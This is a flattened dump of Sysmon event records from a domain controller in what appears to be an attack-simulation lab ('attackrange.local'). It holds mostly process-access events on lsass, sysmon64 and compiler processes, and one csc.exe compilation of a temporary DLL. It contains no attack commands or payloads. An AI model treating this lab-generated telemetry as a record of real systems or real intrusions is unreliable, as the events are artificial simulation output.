13:54:16.013{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.013{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.013{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:18.729{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\ro1hs4vf.dll2020-12-08 13:54:18.635 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-858A-5FCF-CA00-000000009101}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-858A-5FCF-CA00-000000009101}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.713{10ACEC4A-858A-5FCF-C900-000000009101}49044876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-858A-5FCF-CA00-000000009101}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.721{10ACEC4A-858A-5FCF-CA00-000000009101}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES3E5C.tmp" "c:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\CSCD741191C5C54CD4A844D2422FEC27F.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\ro1hs4vf.cmdline" 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.651{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.651{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.651{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 